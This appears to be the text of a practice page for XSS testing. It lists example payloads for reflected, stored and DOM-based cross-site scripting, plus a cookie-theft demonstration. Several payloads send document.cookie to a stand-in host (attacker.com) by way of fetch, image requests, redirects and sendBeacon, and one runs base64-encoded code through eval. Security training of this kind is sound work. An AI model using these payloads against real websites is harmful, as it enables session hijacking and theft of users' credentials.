XSS Testing - BOAND

1. Reflected XSS

Test reflected XSS vulnerabilities

Example Payloads:
• <script>alert('XSS')</script>
• <img src=x onerror=alert('XSS')>
• <svg onload=alert('XSS')>
• <iframe src="javascript:alert('XSS')">
• <body onload=alert('XSS')>
• <script>document.location='http://attacker.com/?c='+document.cookie</script>

2. Stored XSS (Persistent)

Test stored XSS in comments section

Example Payloads:
• <script>alert(document.cookie)</script>
• <img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
• <svg/onload=alert('Stored XSS')>
• <iframe src="javascript:alert('Stored XSS')"></iframe>
• <script>new Image().src='http://attacker.com/steal.php?cookie='+document.cookie</script>

Comments:

3. DOM-Based XSS

Test DOM-based XSS vulnerabilities

Example Payloads:
• <img src=x onerror=alert('DOM XSS')>
• <svg/onload=alert(document.domain)>
• <iframe src="javascript:alert('DOM XSS')">
• Try in URL: #<script>alert('Hash XSS')</script>
• <img src=x onerror="eval(atob('YWxlcnQoJ1hTUycp'))">

4. Cookie Theft Demonstration

Test session hijacking via XSS

Your Current Cookies:

Cookie Theft Payloads:
• <script>fetch('http://attacker.com/?c='+document.cookie)</script>
• <img src=x onerror="new Image().src='http://attacker.com/steal?c='+document.cookie">
• <script>window.location='http://attacker.com/?c='+btoa(document.cookie)</script>
• <script>navigator.sendBeacon('http://attacker.com',document.cookie)</script>

💉 XSS (Cross-Site Scripting) Testing

1. Reflected XSS

2. Stored XSS (Persistent)

Comments:

3. DOM-Based XSS

4. Cookie Theft Demonstration